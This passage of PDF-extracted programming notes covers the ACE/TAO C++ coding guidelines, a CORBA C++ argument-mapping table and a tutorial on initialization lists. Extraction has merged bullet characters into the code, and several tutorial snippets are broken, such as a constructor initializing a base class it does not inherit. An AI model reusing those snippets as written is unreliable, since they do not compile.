o The preferred way to document methods is: o /// This function foos the barso /// another line of documentation if necessaryo /// @param bar The bar you want to fooo void foo (int bar);

o All binary options for ACE and TAO should be specified in terms of the integral values 0 and 1, rather than "true" and "false" or "yes" and "no". All TAO options should be documented in the online TAO options document.

.

Preprocessoro Never #include standard headers directly, except in a few specific ACE files, e.g., OS.h and

stdcpp.h. Let those files #include the correct headers. If you do not do this, your code will not compile with the Standard C++ Library.

o Always use #if defined (MACRONAME) to test if a macro is defined, rather than the simpler #if MACRONAME. Doxygen requires this. The one exception to this the macros used to prevent multiple inclusion of header files, as shown below.

Page 119: Appunti Informatica

o Always follow a preprocessor #endif with a /* */ C-style comment. Using C-style comments with preprocessor code is required for some old compilers. It should correspond to the condition in the matching #if directive. For example,

o #if defined (ACE_HAS_THREADS)o # if defined (ACE_HAS_STHREADS)o # include /**/ <synch.h>o # include /**/ <thread.h>o # define ACE_SCOPE_PROCESS P_PIDo # define ACE_SCOPE_LWP P_LWPIDo # define ACE_SCOPE_THREAD (ACE_SCOPE_LWP + 1)o # elseo # define ACE_SCOPE_PROCESS 0o # define ACE_SCOPE_LWP 1o # define ACE_SCOPE_THREAD 2o # endif /* ACE_HAS_STHREADS */o #endif /* ACE_HAS_THREADS */

o Be sure to put spaces around comment delimiters, e.g., char * /* foo */ instead of char */*foo*/. MS VC++ complains otherwise.

o Always insert a /**/ between an #include and filename, for system headers and ace/pre.h and ace/post.h as shown in the above example. This avoids dependency problems with Visual C++ and prevents Doxygen from including the headers in the file reference trees.

o Be very careful with names of macros, enum values, and variables It's always best to prefix them with something like ACE_ or TAO_. There are too many system headers out there that #define OK, SUCCESS, ERROR, index, s_type, and so on.

o When using macros in an arithmetic expression, be sure to test that the macro is defined, using defined(macro) before specifying the expression. For example:

o #if __FreeBSD__ < 3

will evaluate true on any platform where __FreeBSD__ is not defined. The correct way to write that guard is:

#if defined (__FreeBSD__) && __FreeBSD__ < 3

If using g++, problems like this can be flagged as a warning by using the "-Wundef" command line option.

o Try to centralize #ifdefs with typedefs and #defines. For example, use this: o #if defined(ACE_PSOS)o typedef long ACE_NETIF_TYPE;o # define ACE_DEFAULT_NETIF 0o #else /* ! ACE_PSOS */o typedef const TCHAR* ACE_NETIF_TYPE;o # define ACE_DEFAULT_NETIF ASYS_TEXT("le0")o #endif /* ! ACE_PSOS */

instead of:

#if defined (ACE_PSOS)

// pSOS supports numbers, not names for network interfaces

long net_if,

#else /* ! ACE_PSOS */

const TCHAR *net_if,

Page 120: Appunti Informatica

#endif /* ! ACE_PSOS */

o Protect header files against multiple inclusion with this construct: o #ifndef FOO_Ho #define FOO_Hoo [contents of header file]oo #endif /* FOO_H */

This exact construct (note the #ifndef) is optimized by many compilers such they only open the file once per compilation unit. Thanks to Eric C. Newton <[email protected]> for pointing that out.

If the header #includes an ACE library header, then it's a good idea to include the #pragma once directive:

#ifndef FOO_H #define FOO_H

#include "ace/ACE.h" #if !defined (ACE_LACKS_PRAGMA_ONCE) # pragma once #endif /* ACE_LACKS_PRAGMA_ONCE */

[contents of header file]

#endif /* FOO_H */

#pragma once must be protected, because some compilers complain about it. The protection depends on ACE_LACKS_PRAGMA_ONCE, which is defined in some ACE config headers. Therefore, the protected #pragma once construct should only be used after an #include of an ACE library header. Note that many compilers enable the optimization if the #ifndef protection construct is used, so for them, #pragma once is superfluous.

No code can appear after the final #endif for the optimization to be effective and correct.

o Files that contain parametric classes should follow this style: o #ifndef FOO_T_Ho #define FOO_T_Hoo #include "ace/ACE.h"o #if !defined (ACE_LACKS_PRAGMA_ONCE)o # pragma onceo #endif /* ACE_LACKS_PRAGMA_ONCE */oo // Put your template declarations here...oo #if defined (__ACE_INLINE__)o #include "Foo_T.inl"o #endif /* __ACE_INLINE__ */oo #if defined (ACE_TEMPLATES_REQUIRE_SOURCE)o #include "Foo_T.cpp"o #endif /* ACE_TEMPLATES_REQUIRE_SOURCE */oo #if defined (ACE_TEMPLATES_REQUIRE_PRAGMA)o #pragma implementation "Foo_T.cpp"

Page 121: Appunti Informatica

o #endif /* ACE_TEMPLATES_REQUIRE_PRAGMA */oo #endif /* FOO_T_H */

Notice that some compilers need to see the code of the template, hence the .cpp file must be included from the header file.

To avoid multiple inclusions of the .cpp file it should also be protected as in:

#ifndef FOO_T_CPP #define FOO_T_CPP

#include "Foo_T.h" #if !defined (ACE_LACKS_PRAGMA_ONCE) # pragma once #endif /* ACE_LACKS_PRAGMA_ONCE */

#if !defined (__ACE_INLINE__) #include "ace/Foo_T.inl" #endif /* __ACE_INLINE__ */

// put your template code here

#endif /* FOO_T_H */

Finally, you may want to include the template header file from a non-template header file (check $ACE_ROOT/ace/Synch.h); in such a case the template header should be included after the inline function definitions, as in:

#ifndef FOO_H #define FOO_H

#include "ace/ACE.h" #if !defined (ACE_LACKS_PRAGMA_ONCE) # pragma once #endif /* ACE_LACKS_PRAGMA_ONCE */

// Put your non-template declarations here...

#if defined (__ACE_INLINE__) #include "Foo.inl" #endif /* __ACE_INLINE__ */

#include "Foo_T.h"

#endif /* FOO_H */

o Avoid #include <math.h> if at all possible. The /usr/include/math.h on SunOS 5.5.1 through 5.7 defines a struct name exception, which complicates use of exceptions.

o On a .cpp file always include the corresponding header file first, like this:o // This is Foo.cppoo #include "Foo.h"o #include "tao/Bar.h"o #include "ace/Baz.h"oo // Here comes the Foo.cpp code....

In this way we are sure that the header file is self-contained and can be safely included from some place else.

o In the TAO library never include <corba.h>, this file should only be included by the user and introduces cyclic dependencies in the library that we must avoid.

Page 122: Appunti Informatica

o Never include a header file when a forward reference will do, remember that templates can be forward referenced too. Consult your favorite C++ book to find out when you must include the full class definition.

C++ Syntax and Constructso for loops should look like: o for (unsigned int i = 0; i < count; ++i)o ++total;

Though, I prefer to always wrap the body of the loop in braces, to avoid surprises when other code or debugging statements are added, and to maintain sanity when the body consists of a macro, such as an ACE_ASSERT without a trailing semicolon:

for (unsigned int i = 0; i < count; ++i) { ACE_ASSERT (++total < UINT_MAX;) }

Similarly, if statements should have a space after the "if", and no spaces just after the opening parenthesis and just before the closing parenthesis.

o If a loop index is used after the body of the loop, it must be declared before the loop. For example,

o size_t i = 0;o for (size_t j = 0; file_name [j] != '\0'; ++i, ++j)o {o if (file_name [j] == '\\' && file_name [j + 1] == '\\')o ++j;oo file_name [i] = file_name [j];o }oo // Terminate this string.o file_name [i] = '\0';

o Prefix operators are generally more efficient than postfix operators. Therefore, they are preferred over their postfix counterparts where the expression value is not used.

Therefore, use this idiom for iterators, with prefix operator on the loop index:

ACE_Ordered_MultiSet<int> set; ACE_Ordered_MultiSet_Iterator<int> iter(set);

for (i = -10; i < 10; ++i) set.insert (2 * i + 1);

rather than the postfix operator:

for (i = -10; i < 10; i++) set.insert (2 * i + 1);

o Prefer using if (...) else .... instead of ?: operator. It is a lot less error prone, and will help you avoid bugs caused due to the precedence of ?: , compared with other operators in an expression.

o When a class provides operator==, it must also provide operator!=. Also, both these operators must be const and return bool.

o Avoid unnecessary parenthesis. We're not writing Lisp :-)

Page 123: Appunti Informatica

o Put inline member functions in a .inl file. That file is conditionally included by both the .h file, for example:

o class ACE_Export ACE_High_Res_Timero {o [...]o };oo #if defined (__ACE_INLINE__)o #include "ace/High_Res_Timer.inl"o #endif /* __ACE_INLINE__ */

and .cpp file:

#define ACE_BUILD_DLL #include "ace/High_Res_Timer.h"

#if !defined (__ACE_INLINE__) #include "ace/High_Res_Timer.inl" #endif /* __ACE_INLINE__ */

ACE_ALLOC_HOOK_DEFINE(ACE_High_Res_Timer)

NOTE: It is very important to ensure than an inline function will not be used before its definition is seen. Therefore, the inline functions in the .inl file should be arranged properly. Some compilers, such as g++ with the -Wall option, will issue warnings for violations.

o Some inlining heuristics: One liners should almost always be inline, as in: ACE_INLINE Foo::bar () { this->baz (); }

The notable exception is virtual functions, which should generally not be inlined. Big (more than 10 lines) and complex function (more than one if () statement, or a

switch, or a loop) should not be inlined. Medium sized stuff depends on how performance critical it is. If you know that it's in

the critical path, then make it inline. When in doubt, profile the code.o ACE_Export must be inserted between the class keyword and class name for all classes that are

exported from libraries, as shown in the example above. However, do not use ACE_Export for template classes or classes that are not used out of the ACE library, for example.!

o Mutators and accessors should be of this form:o /// Sets @c object_addr_ cache from @c host and @c port.o void object_addr (const ACE_INET_Addr &);oo /// Returns the ACE_INET_Addr for this profile.o const ACE_INET_Addr &object_addr const (void);

instead of the "set_" and "get_" form.

o Never use delete to deallocate memory that was allocated with malloc. Similarly, never associate free with new. ACE_NEW or ACE_NEW_RETURN should be used to allocate memory, and delete should be used to deallocate it. And be careful to use the correct form, delete or delete [] to correspond to the allocation.

Page 124: Appunti Informatica

o Don't check for a pointer being 0 before deleting it. It's always safe to delete a 0 pointer. If the pointer is visible outside the local scope, it's often a good idea to 0 it _after_ deleting it. Note, the same argument applies to free().

o Always use ACE_NEW or ACE_NEW_RETURN to allocate memory, because they check for successful allocation and set errno appropriately if it fails.

o Never compare or assign a pointer value with NULL; use 0 instead. The language allows any pointer to be compared or assigned with 0. The definition of NULL is implementation dependent, so it is difficult to use portably without casting.

o Never cast a pointer to or from an int or a long. On all currently supported ACE platforms, it is safe to cast a pointer to or from intptr_t or uintptr_t (include ace/Basic_Types.h).

o Be very careful when selecting an integer type that must be a certain size, e.g., 4 bytes. long is not 4 bytes on all platforms; it is 8 bytes on many 64-bit machines. ACE_UINT32 is always 4 bytes, and ACE_UINT64 is always 8 bytes.

o If a class has any virtual functions, and its destructor is declared explicitly in the class, then the destructor should always be virtual as well. And to support compiler activities such as generation of virtual tables and, in some cases, template instantiation, the virtual destructor should not be inline. (Actually, any non-pure virtual function could be made non-inline for this purpose. But, for convenience, if its performance is not critical, it is usually easiest just to make the virtual destructor non-inline.)

o Avoid default arguments unless there's a good reason. For an example of how they got us into a jam is:

o ACE_Time_Value (long sec, long usec = 0);

So, ACE_Time_Value (2.5) has the unfortunate effect of coercing the 2.5 to a long with value 2. That's probably not what the programmer intended, and many compilers don't warn about it.

A nice fix would be to add an ACE_Time_Value (double) constructor. But, that would cause ambiguous overloading due to the default value for the second argument of ACE_Time_Value (long sec, long usec = 0). We're stuck with ACE_Time_Value, but now we know that it's easy to avoid.

o Constructor initializers must appear in the same order as the data members are declared in the class header. This avoids subtle errors, because initialization takes place in the order of member declaration.

o Initialization is usually cleaner than assignment, especially in a conditional. So, instead of writing code like this:

o ssize_t n_bytes;oo // Send multicast of one byte, enough to wake up server.o if ((n_bytes = multicast.send ((char *) &reply_port,o sizeof reply_port)) == -1)

Write it like this:

ssize_t n_bytes = multicast.send ((char *) &reply_port, sizeof reply_port)

// Send multicast of one byte, enough to wake up server. if (n_bytes == -1)

But, beware if the initialization is of a static variable. A static variable is only initialized the first time its declaration is seen. Of course, we should avoid using static (and non-constant) variables at all.

Page 125: Appunti Informatica

o It is usually clearer to write conditionals that have both branches without a negated condition. For example,

o if (test)o {o // true brancho }o elseo {o // false brancho }

is preferred over:

if (! test) { // false test branch } else { // true test branch }

o If a cast is necessary, avoid use of C-style "sledgehammer" casts. Use standard C++ casts (e.g. static_cast<int> (foo)) instead.

o In general, if instances of a class should not be copied, then a private copy constructor and assignment operator should be declared for the class, but not implemented. For example:

o // Disallow copying by not implementing the following . . .o ACE_Object_Manager (const ACE_Object_Manager &);o ACE_Object_Manager &operator= (const ACE_Object_Manager &);

If the class is a template class, then the ACE_UNIMPLEMENTED_FUNC macro should be used:

// = Disallow copying... ACE_UNIMPLEMENTED_FUNC (ACE_TSS (const ACE_TSS<TYPE> &)) ACE_UNIMPLEMENTED_FUNC (void operator= (const ACE_TSS<TYPE> &))

ACE_UNIMPLEMENTED_FUNC can be used with non-template classes as well. Though for consistency and maximum safety, it should be avoided for non-template classes.

o Never use BOOL, or similar types. (ACE_CDR::Boolean and CORBA::Boolean are acceptable). Use the standard C++ bool for boolean variables, instead.

o Functions should always return -1 to indicate failure, and 0 or greater to indicate success.o Separate the code of your templates from the code for non-parametric classes: some compilers

get confused when template and non-template code is mixed in the same file.o It's a good idea to specify the include path (with -I) to include any directory which contains

files with template definitions. The Compaq Tru64 cxx -ptv compiler option may help diagnose missing template instantiation problems.

o When referring to member variables and functions, use this->member. This makes it clear to the reader that a class member is being used. It also makes it crystal clear to the compiler which variable/function you mean in cases where it might make a difference.

o Don't use template template arguments, this C++ construct is not supported by the HP aCC 3.70 compiler at this moment. For example the following template decleration is one that just doesn't work.

o template<typename S_var, size_t BOUND, template <typename> class Insert_Policy> class A {};

Page 126: Appunti Informatica

I/Oo Use ACE_DEBUG for printouts, and ACE_OS::fprintf () for file I/O. Avoid using iostreams

because of implementation differences across platforms.o After attempting to open an existing file, always check for success. Take appropriate action if

the open failed.o Notice that ACE_DEBUG and ACE_ERROR don't support %ld of any other multicharacter

format. WCHAR conformity

o For ACE, use ACE_TCHAR instead of char for strings and ACE_TEXT() around string literals. Exceptions are char arrays used for data and strings that need to remain as 1 byte characters.

o If you have a char string that needs to be converted to ACE_TCHAR, use the ACE_TEXT_CHAR_TO_TCHAR() macro. If you have a ACE_TCHAR string that needs to be converted to a char string, use the ACE_TEXT_ALWAYS_CHAR() macro

o Do not use the Win32 TCHAR macros. The wide character-ness of ACE is separate from UNICODE and _UNICODE.

o For TAO, don't use ACE_TCHAR or ACE_TEXT. The CORBA specification defines APIs as using char. So most of the time there is no need to use wide characters.

Exceptionso There are many ways of throwing and catching exceptions. The code below gives several

examples. Note that each method has different semantics and costs. Whenever possible, use the first approach.

o #include "iostream.h"oo class exe_fooo {o public:o exe_foo (int data) : data_ (data)o { cerr << "constructor of exception called" << endl; }o ~exe_foo ()o { cerr << "destructor of exception called" << endl; }o exe_foo (const exe_foo& foo) : data_ (foo.data_)o { cerr << "copy constructor of exception called"o << endl; }o int data_;o };ooo voido good (int a)o {o throw exe_foo (a);o };oo voido bad (int a)o {o exe_foo foo (a);o throw foo;o };oo int main ()o {o cout << endl << "First exception" << endlo << endl;o tryo {o good (0);o }o catch (exe_foo &foo)o {o cerr << "exception caught: " << foo.data_o << endl;

Page 127: Appunti Informatica

o }oo cout << endl << "Second exception" << endlo << endl;o tryo {o good (0);o }o catch (exe_foo foo)o {o cerr << "exception caught: " << foo.data_o << endl;o }oo cout << endl << "Third exception" << endlo << endl;o tryo {o bad (1);o }o catch (exe_foo &foo)o {o cerr << "exception caught: " << foo.data_o << endl;o }oo cout << endl << "Fourth exception" << endlo << endl;o tryo {o bad (1);o }o catch (exe_foo foo)o {o cerr << "exception caught: " << foo.data_o << endl;o }oo return 0;o }

Output is:

First exception

constructor of exception called exception caught: 0 destructor of exception called

Second exception

constructor of exception called copy constructor of exception called exception caught: 0 destructor of exception called destructor of exception called

Third exception

constructor of exception called copy constructor of exception called destructor of exception called exception caught: 1 destructor of exception called

Page 128: Appunti Informatica

Fourth exception

constructor of exception called copy constructor of exception called destructor of exception called copy constructor of exception called exception caught: 1 destructor of exception called destructor of exception called

Compilationo Whenever you add a new test or example to ACE or TAO, make sure that you modify the

MPC file in the parent directory. This will make sure that your code gets compiled on a regular basis.

ACE Shared Libary Guidelines

Create a separate export macro for each dynamic library. A header file containing the export macro and additional support macros should be generated by using the ACE_wrappers/bin/generate_export_file.pl Perl script.

Make sure that your classes, structures and free functions are annotated with this export macro. The only exceptions are pure template classes, structures and free functions.

Only classes (and structures, free functions, etc) that are part of the library public interface must be exported (e.g. declared with an export macro). Those that are only meant to be used internally need not be exported, particularly for g++ >=4.0 since doing so defeats some neat optimizations. Here's a common case in where an export macro is generally used unnecessarily:

class FooExport Foo{public: virtual void kung_fu () = 0;};

class FooExport Bar : public Foo{public: virtual void kung_fu () { ... }};

class FooExport FooFactory{public: Foo * make_foo () { // Assume that this implementation is hidden from // the application and is consequently out of line. return new Bar(); }};

Here the application is only meant to invoke operations through a pointer or reference to the abstract base class "Foo" created by the "FooFactory", not the "Bar" subclass. In this case, exporting "Bar" is unnecessary. If your concrete class is meant to be used outside of the shared library (e.g. as a template parameter, within a dynamic_cast<>, etc) you must then export it. Otherwise, avoid doing so if you can.

Page 129: Appunti Informatica

Make sure that you specify that you are creating a dynamic library in your MPC file by adding a sharedname tag.

Make sure that you add the FOO_BUILD_DLL preprocessor symbol to the dynamicflags of the MPC project that is used to build a library. Note that the export files are setup such that when this macro is defined, the symbols are exported, otherwise they are imported. The default behaviour is to set up for import so that clients of your library don't need to worry about arcane build flags like FOO_BUILD_DLL in their build setup. This ties back to the first item.

When you specify the order of libraries to link to, make sure that the dependent libraries come after the libraries which depend on them, i.e., your link line should always contain -lDependsOnFoo -lFoo. Note that this is not a requirement on GNU/Linux but linkers on other platforms are not as forgiving.

Use the ACE_SINGLETON_DECLARE macro to declare a class as a singleton. Declare exported (i.e. default visibility) singleton templates prior to typedefs that reference them. This prevents g++ 4.0 from silently making their visibility hidden (see Bug 2260 for details).

Avoid inlining virtual functions in classes that must be exported since doing so can cause RTTI related problems (e.g. dynamic_cast<> failures) when using g++ >= 4.0 due to our use of that compiler's "visibility attribute" support that is tied in to the export macros. This includes virtual destructors automatically created by the compiler when you don't declare one. Make sure you define a no-op out-of-line virtual destructor if your base class has a virtual destructor since you may otherwise run into the mentioned RTTI problems.

ACE Usage Guidelines

Always use the ACE_OS namespace functions instead of bare OS system calls. As a general rule, the only functions that should go into the ACE_OS namespace are ones that have

direct equivalents on some OS platform. Functions that are extensions should go in the ACE namespace.

Use the ACE_SYNCH_MUTEX macro, instead of using one of the specific mutexes, such as ACE_Thread_Mutex. This provides portability between threaded and non-threaded platforms.

Avoid creating a static instance of user-defined (class) type. Instead, either create it as an ACE_Singleton, ACE_TSS_Singleton, or as an ACE_Cleanup object. See the ACE Singleton.h, Object_Manager.h, and Managed_Object.h header files for more information.

Static instances of built-in types, such as int or any pointer type, are fine.

Construction of static instance of a user-defined type should never spawn threads. Because order of construction of statics across files is not defined by the language, it is usually assumed that only one thread exists during static construction. This allows statics suchs as locks to be safely created. We do not want to violate this assumption.

Do not use C++ exception handling directly. Some platforms do not support it. And, it can impose an execution speed penalty. Instead use the TAO/ACE try/catch macros.

Because ACE does not use exception handling, dealing with failures requires a bit of care. This is especially true in constructors. Consider the following approach:

ACE_NEW_RETURN (this->name_space_, LOCAL_NAME_SPACE, -1); if (ACE_LOG_MSG->op_status () != 0) ....

Page 130: Appunti Informatica

This snip of code is from ACE_Naming_Context. All failed constructors in ACE (should) call ACE_ERROR. This sets the thread-specific op_status, which can be checked by the caller. This mechanism allows the caller to check for a failed constructor without the requiring the constructor to throw exceptions.

Another consequence of ACE's avoidance of exception handling is that you should use open() methods on classes that perform initializations that can fail. This is because open() returns an error code that's easily checked by the caller, rather than relying on constructor and thread-specific status values.

Avoid using the C++ Standard Template Library (STL) in our applications. Some platforms do not support it yet. It is safe to use the STL generic algoritms. The following have been used already and don't seem to cause any portability issues:

std::swap std::for_each std::fill std::generate std::transform std::copy

Be very careful with ACE_ASSERT. It must only be used to check values; it may never be used to wrap a function call, or contain any other side effect. That's because the statement will disappear when ACE_NDEBUG is enabled. For example, this code is BAD:

ACE_ASSERT (this->next (retv) != 0); // BAD CODE!

Instead, the above should be coded this way:

int const result = this->next (retv); ACE_ASSERT (result != 0); ACE_UNUSED_ARG (result);

Never put side effects in ACE_DEBUG code: ACE_DEBUG ((LM_DEBUG, "handling signal: %d iterations left\n", --this->iterations_)); // BAD CODE!

Note that this won't work correctly if ACE_NDEBUG is defined, for the same reason that having side-effects in ACE_ASSERTs won't work either, i.e., because the code is removed.

Be very careful with the code that you put in a signal handler. On Solaris, the man pages document systems calls as being Async-Signal-Safe if they can be called from signal handlers. In general, it's best to just set a flag in a signal handler and take appropriate action elsewhere. It's also best to avoid using signals, especially asynchronous signals.

Immediately after opening a temporary file, unlink it. For example: ACE_HANDLE h = open the file (filename); ACE_OS::unlink (filename);

This avoids leaving the temporary file even if the program crashes.

Be sure to specify the THR_BOUND thread creation flag for time-critical threads. This ensures that the thread competes for resources globally on Solaris. It is harmless on other platforms.

Page 131: Appunti Informatica

Other ACE and TAO Guidelines

When enhancing, updating, or fixing ACE or TAO, always: 1. Test your change on at least Windows and Linux before commiting. After commiting watch

the scoreboard to catch errors your change may be related to on other platforms. 2. An an entry to the appropriate ChangeLog. TAO and some ACE subdirectories, such as

ASNMP, JAWS, and gperf, have their own ChangeLogs. If you don't use one of those, use the ChangeLog in the top-level ACE_wrappers directory. A ChangeLog entry should have the form:

<tab> * dir/file.ext [(methods)]: description...

If you have a number of files, the names should be on separate lines. In this case, it's also ok to start the description on a new line indented to "dir."

3. Commit your change using a message of this form:

ChangeLogTag: Thu Jul 22 09:55:10 UTC 1999 David L. Levine <[email protected]>

4. If the change is in response to a request by someone else: 1. Make sure that person is acknowledged in ACE_wrappers/THANKS, and2. Respond to that person.

Never add copyrighted, confidential, or otherwise restricted code to the ACE or TAO distributions without reviewing the situation with DOC management (i.e. Doug Schmidt). You will also most likely need to get written permission from the owner. The particular language and form needed will be relayed to you after discussing it with DOC management.

SVN Usage Guidelines

Always make sure that a change builds and executes correctly on at least one platform before checking it into the SVN repository. All changes must be tested with g++ before commiting. That means you may need to test on at least two platforms.

Script Guidelines

In general, it's best to write scripts in Perl. It's OK to use Bourne shell. Never, never, never use csh, ksh, bash, or any other kind of shell.

Follow the Perl style guide guide as closely as possible. man perlstyle to view it. Don't specify a hard-coded path to Perl itself. Use the following code at the top of the script to pick up

perl from the users PATH: eval '(exit $?0)' && eval 'exec perl -S $0 ${1+"$@"}' & eval 'exec perl -S $0 $argv:q' if 0;

Never, never, never start the first line of a script with "#", unless the first line is "#! /bin/sh". With just "#", t/csh users will spawn a new shell. That will cause their .[t]cshrc to be processed, possibly clobbering a necessary part of their environment.

If your Perl script relies on features only available in newer versions of Perl, include the a statement similar to the following:

require 5.003;

Page 132: Appunti Informatica

Don't depend on . being in the user's path. If the script spawns another executable that is supposed to be in the current directory, be sure the prefix its filename with ..

Software Engineering Guidelines

Advise: Keep other developers informed of problems and progress. Authorize: We have contractual obligations to not unilaterally change interfaces. If you need to

change or remove an interface, get an OK. Minimize risk: Test all changes. Solicit review of changes. Revise only when necessary: Every change has risk, so avoid making any change unless there is a

good reason for it. Normalize: Factor out commonality. For example, maintain a data value in only one place. Synthesize: Build stubs and scaffolding early to simulate the complete system. Maintain a checked-in

version of the system that cleanly builds and tests at all times. Be available: Breaking compilation in one platform or another should be avoided (see above), but it is

bound to happen when so many platforms are in use. Be available after making a change, if you won't be available for at least 48 hours after the change is made then don't make it!

ACE Design Rules

Last modified: Wed Nov 23 11:00:44 CST 2005

Back to ACE Documentation Home.

Page 133: Appunti Informatica

CORBA programming: C++ type mapping for argument passing (C++ /CORBA)

Argument type mappings are discussed in this topic and summarized in the two tables below. For the rules that must be observed when passing parameters (in , inout, out, or return value) to a CORBA object implementation, see Argument passing considerations for C++ bindings.

For primitive types and enumerations, the type mapping is straightforward. For in parameters and return values the type mapping is the C++ type representation (abbreviated as "T" in the text that follows) of the IDL specified type. For inout and out parameters the type mapping is a reference to the C++ type representation (abbreviated as "T&" in the text that follows).

For object references, the type mapping uses _ptr for in parameters and return values and _ptr& for inout and out parameters. That is, for a declared interface A, an object reference parameter is passed as type A_ptr or A_ptr&. The conversion functions on the _var type permit the client (caller) the option of using _var type rather than the _ptr for object reference parameters. Using the _var type may have an advantage in that it relieves the client (caller) of the responsibility of deallocating a returned object reference (out parm or return value) between successive calls. This is because the assignment operator of a _ptr to a _var automatically releases the embedded reference.

The type mapping of parameters for aggregate types (also referred to as complex types) are complicated by when and how the parameter memory is allocated and deallocated. Mapping in parameters is straightforward because the parameter storage is caller allocated and read only. For an aggregate IDL type t with a C++ type representation of T the in parameter mapping is const T&. The mapping of out and inout parameters is slightly more complex. To preserve the client capability to stack allocate fixed length types, OMG has defined the mappings for fixed-length and variable-length aggregates differently. The inout and out mapping of an aggregate type represented in C++ as T is T& for fixed-length aggregates and as T*& for variable-length aggregates.

Page 134: Appunti Informatica

Basic argument and result passing

For an aggregate type represented by the C++ type T, the T_var type is also defined. The conversion operations on each T_var type allows the client (caller) to use the T_var type directly for any directionality, instead of using the required form of the T type ( T, T& or T*&) The emitted bindings define the operation signatures in terms of the parameter passing modes shown in the tableT_var argument and result passing, and the T_var types provide the necessary conversion operators to allow them to be passed directly.

T_var argument and result passing

For parameters that are passed or returned as a pointer type (T*) or reference to pointer(T*&) the programmer should not pass or return a null pointer. This cannot be enforced by the bindings.

Data Type In Inout Out Return

short short short& short& short

long long long& long& long

unsigned short ushort ushort& ushort& ushort

unsigned long ulong ulong& ulong& ulong

float float float& float& float

double double double& double& double

boolean boolean boolean& boolean& boolean

char char char& char& char

wchar wchar wchar& wchar& wchar

octet Octet Octet& Octet& Octet

enum enum enum& enum& enum

object reference ptr objref_ptr objref_ptr& objref_ptr& objref_ptr

struct, fixed const struct& struct& struct& struct

struct, variable const struct& struct& struct*& struct*

union, fixed const union& union& union& union

union, variable const union& union*& union*& union*

string const char* char*& char*& char*

wstring const char* char*& char*& char*

sequence const sequence& sequence& sequence*& sequence*

array, fixed const array array array array slice*

array, variable const array array array slice*& array slice*

any const any& any& any*& any*

Data Type In Inout Out Return

object reference_var const object_var& objref_var& objref_var& objref_var

struct_var const struct_var& struct_var& struct_var& struct_var

union_var const union_var& union_var& union_var& union_var

string_var const string_var& string_var& string_var& string_var

sequence_var const sequence_var& sequence_var& sequence_var& sequence_var

array_var const array_var& array_var& array_var& array_var

Page 135: Appunti Informatica

Understanding Initialization Lists in C++ (C++)http://www.cprogramming.com/tutorial/initialization-lists-c++.html

Understanding the Start of an Object's Lifetime

In C++, whenever an object of a class is created, its constructor is called. But that's not all--its parent class constructor is called, as are the constructors for all objects that belong to the class. By default, the constructors invoked are the default ("no-argument") constructors. Moreover, all of these constructors are called before the class's own constructor is called.

For instance, take the following code: include class Foo{ public: Foo() { std::cout << "Foo's constructor" << std::endl; }};class Bar : public Foo{ public: Bar() { std::cout << "Bar's constructor" << std::endl; }};

int main(){ // a lovely elephant ;) Bar bar;}

The object bar is constructed in two stages: first, the Foo constructor is invoked and then the Bar constructor is invoked. The output of the above program will be to indicate that Foo's constructor is called first, followed by Bar's constructor.

Why do this? There are a few reasons. First, each class should need to initialize things that belong to it, not things that belong to other classes. So a child class should hand off the work of constructing the portion of it that belongs to the parent class. Second, the child class may depend on these fields when initializing its own fields; therefore, the constructor needs to be called before the child class's constructor runs. In addition, all of the objects that belong to the class should be initialized so that the constructor can use them if it needs to.

But what if you have a parent class that needs to take arguments to its constructor? This is where initialization lists come into play. An initialization list immediately follows the constructor's signature, separated by a colon: class Foo : public parent_class{ Foo() : parent_class( "arg" ) // sample initialization list { // you must include a body, even if it's merely empty }};

Note that to call a particular parent class constructor, you just need to use the name of the class (it's as though you're making a function call to the constructor).

For instance, in our above example, if Foo's constructor took an integer as an argument, we could do this: include class Foo{ public:

Page 136: Appunti Informatica

Foo( int x ) { std::cout << "Foo's constructor " << called with " << x << std::endl; }};

class Bar{ public: Bar() : Foo( 10 ) // construct the Foo part of Bar { std::cout << "Bar's constructor" << std::endl; }};

int main(){ Bar stool;}

Using Initialization Lists to Initialize Fields

In addition to letting you pick which constructor of the parent class gets called, the initialization list also lets you specify which constructor gets called for the objects that are fields of the class. For instance, if you have a string inside your class: class Qux{ public: Qux() : _foo( "initialize foo to this!" ) { } // This is nearly equivalent to // Qux() { _foo = "initialize foo to this!"; } // but without the extra call to construct an empty string

private: std::string _foo;};

Here, the constructor is invoked by giving the name of the object to be constructed rather than the name of the class (as in the case of using initialization lists to call the parent class's constructor).

If you have multiple fields of a class, then the names of the objects being initialized should appear in the order they are declared in the class (and after any parent class constructor call): class Baz{ public: Baz() : _foo( "initialize foo first" ), _bar( "then bar" ) { }

private: std::string _foo; std::string _bar;};

Initialization Lists and Scope Issues

If you have a field of your class that is the same name as the argument to your constructor, then the initialization list "does the right thing." For instance, class Baz{ public: Bar( std::string foo ) : foo( foo ) { }

Page 137: Appunti Informatica

private: std::string foo;};

is roughly equivalent to class Baz{ public: Bar( std::string foo ) { this->foo = foo; } private: std::string foo;};

That is, the compiler knows which foo belongs to the object, and which foo belongs to the function.

Initialization Lists and Primitive Types

It turns out that initialization lists work to initialize both user-defined types (objects of classes) and primitive types (e.g., int). When the field is a primitive type, giving it an argument is equivalent to assignment. For instance, class Quux{ public: Quux() : _my_int( 5 ) // sets _my_int to 5 { }

private: int _my_int;};

This behavior allows you to specify templates where the templated type can be either a class or a primitive type (otherwise, you would have to have different ways of handling initializing fields of the templated type for the case of classes and objects). template class my_template{ public: // works as long as T has a copy constructor my_template( T bar ) : _bar( bar ) { }

private: T _bar;};

Initialization Lists and Const Fields

Using initialization lists to initialize fields is not always necessary (although it is probably more convenient than other approaches). But it is necessary for const fields. If you have a const field, then it can be initialized only once, so it must be initialized in the initialization list. class const_field{ public: const_field() : _constant( 1 ) { } // this is an error: const_field() { _constant = 1; }

private: const int _constant;};

Page 138: Appunti Informatica

When Else do you Need Initialization Lists?

No Default Constructor

If you have a field that has no default constructor (or a parent class with no default constructor), you must specify which constructor you wish to use.

References

If you have a field that is a reference, you also must initialize it in the initialization list; since references are immutable they can be initialized only once.

Initialization Lists and Exceptions

Since constructors can throw exceptions, it's possible that you might want to be able to handle exceptions that are thrown by constructors invoked as part of the initialization list.

First, you should know that even if you catch the exception, it will get rethrown because it cannot be guaranteed that your object is in a valid state because one of its fields (or parts of its parent class) couldn't be initialized. That said, one reason you'd want to catch an exception here is that there's some kind of translation of error messages that needs to be done.

The syntax for catching an exception in an initialization list is somewhat awkward: the 'try' goes right before the colon, and the catch goes after the body of the function: class Foo{ Foo() try : _str( "text of string" ) { } catch ( ... ) { std::cerr << "Couldn't create _str"; // now, the exception is rethrown as if we'd written // "throw;" here }};

